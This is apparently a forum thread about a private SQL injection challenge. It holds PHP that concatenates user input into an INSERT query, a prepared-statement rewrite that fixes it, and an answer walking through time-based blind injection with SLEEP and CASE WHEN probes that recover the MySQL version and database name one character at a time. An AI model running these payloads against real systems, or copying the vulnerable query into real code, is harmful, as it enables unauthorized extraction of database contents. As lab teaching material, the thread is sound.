I have a simple web application that allows posting a message to a MySQL database. My challenge is to get all the information about that database. Unfortunately there's no output, so I have to do a time-based blind injection.
This payload works, and the response takes 5 seconds to reach the client.
' RLIKE SLEEP(5) AND '1'='1
I have to somehow replace the '1'='1 so I can check for table names or users.
Any idea?
Following is the code with the vulnerable query.
<?php
if (isset($_POST['feedback'])) {
    $id = $_POST['feedback'];
    // The POST value is concatenated straight into the SQL string: this is the injection point.
    $query = "INSERT INTO `hackdb`.`feedback` (`id` ,`feedback`, `feedback_read`, `created` ,`receiver`) VALUES (NULL,'".$_POST['feedback']."', '0', CURRENT_TIMESTAMP, '17')";
    if ($result = $mysqli->query($query)) {
        //echo "Done";
    } else {
        //echo $mysqli->error;
    }
    // The same message is returned whether the query succeeded or failed, so only timing leaks information.
    echo "Thank you for your feedback! We'll contact you later.";
} else {
    echo "";
}
?>
(Disclaimer: This is a challenge and I'm working on a private server inside a VM. Nothing unethical is going on here)
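The INSERT from the question rewritten with a prepared statement, as an added example that is not part of the original post or the challenge code; it assumes the same $mysqli connection and the same hackdb.feedback columns, and uses mysqli's exception mode instead of the commented-out error echo.

```php
<?php
// Added example (not from the original post): the vulnerable INSERT rewritten
// so the feedback text travels as a bound parameter, never as part of the SQL.
// Assumes the same $mysqli connection and hackdb.feedback columns as the question.
if (isset($_POST['feedback'])) {
    $feedback = $_POST['feedback'];

    // Surface query failures as exceptions so they are not silently swallowed.
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

    $sql = "INSERT INTO `hackdb`.`feedback`
                (`id`, `feedback`, `feedback_read`, `created`, `receiver`)
            VALUES (NULL, ?, '0', CURRENT_TIMESTAMP, '17')";

    try {
        $stmt = $mysqli->prepare($sql);
        // 's' binds the value as a string. A payload such as
        // ' RLIKE SLEEP(5) AND '1'='1 or (SELECT SLEEP(5)) is stored as
        // literal text; the server never parses it as SQL, so no delay occurs.
        $stmt->bind_param('s', $feedback);
        $stmt->execute();
        $stmt->close();
        echo "Thank you for your feedback! We'll contact you later.";
    } catch (mysqli_sql_exception $e) {
        // Log server-side only; the client must not see $e->getMessage().
        error_log('feedback insert failed: ' . $e->getMessage());
        http_response_code(500);
        echo "Sorry, something went wrong.";
    }
}
```

With the value bound as data, the `(SELECT ...)` subquery trick the answer below relies on no longer reaches the parser, and the response time stays flat regardless of input.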
Looking into your code, only the field feedback is vulnerable to time-based blind SQL injection vectors.
Create database/create table
CREATE DATABASE IF NOT EXISTS hackdb;
-- Qualified with the database name so the INSERTs below resolve without a USE statement.
CREATE TABLE IF NOT EXISTS hackdb.feedback (
    feedback VARCHAR(255)
);
You can inject using (SELECT ...) into the feedback column because this is valid SQL.
Query
INSERT INTO hackdb.feedback (feedback)
VALUES (
    (SELECT 1)
);
Result
1 row(s) affected
Execution Time : 0.013 sec
Transfer Time : 0 sec
Total Time : 0.014 sec
Test the time-based blind SQL injection vector.
Query
INSERT INTO hackdb.feedback (feedback)
VALUES (
    (SELECT SLEEP(5))
);
Result
1 row(s) affected
Execution Time : 5.717 sec
Transfer Time : 0 sec
Total Time : 5.718 sec
And we are good to go.
Let's find out the database version. We can use MySQL's VERSION() function for that.
Query
INSERT INTO hackdb.feedback (feedback)
VALUES (
    (SELECT CASE WHEN VERSION() LIKE '5.1%' THEN SLEEP(5) ELSE 0 END FROM DUAL)
);
Result
1 row(s) affected
Execution Time : 0.014 sec
Transfer Time : 0 sec
Total Time : 0.014 sec
No bingo.
Query
INSERT INTO hackdb.feedback (feedback)
VALUES (
    (SELECT CASE WHEN VERSION() LIKE '5.7%' THEN SLEEP(5) ELSE 0 END FROM DUAL)
);
Result
1 row(s) affected
Execution Time : 5.733 sec
Transfer Time : 0 sec
Total Time : 5.734 sec
Bingo.
Now we are going to find the database in use. We can use MySQL's DATABASE() function for that.
Query
INSERT INTO hackdb.feedback (feedback)
VALUES (
    (SELECT CASE
         WHEN (SELECT 1 FROM DUAL WHERE DATABASE() LIKE 's%') THEN SLEEP(5)
         ELSE 0
     END FROM DUAL)
);
Result
1 row(s) affected
Execution Time : 0.014 sec
Transfer Time : 0 sec
Total Time : 0.015 sec
No bingo.
Query
INSERT INTO hackdb.feedback (feedback)
VALUES (
    (SELECT CASE
         WHEN (SELECT 1 FROM DUAL WHERE DATABASE() LIKE 'h%') THEN SLEEP(5)
         ELSE 0
     END FROM DUAL)
);
Result
1 row(s) affected
Execution Time : 5.715 sec
Transfer Time : 0 sec
Total Time : 5.716 sec
Bingo.
Now you can add a second char into the LIKE part, and so on.
I have given you some basic time-based blind SQL injection vectors. It's up to you to find the tables in the database; I don't want to spoil your complete challenge.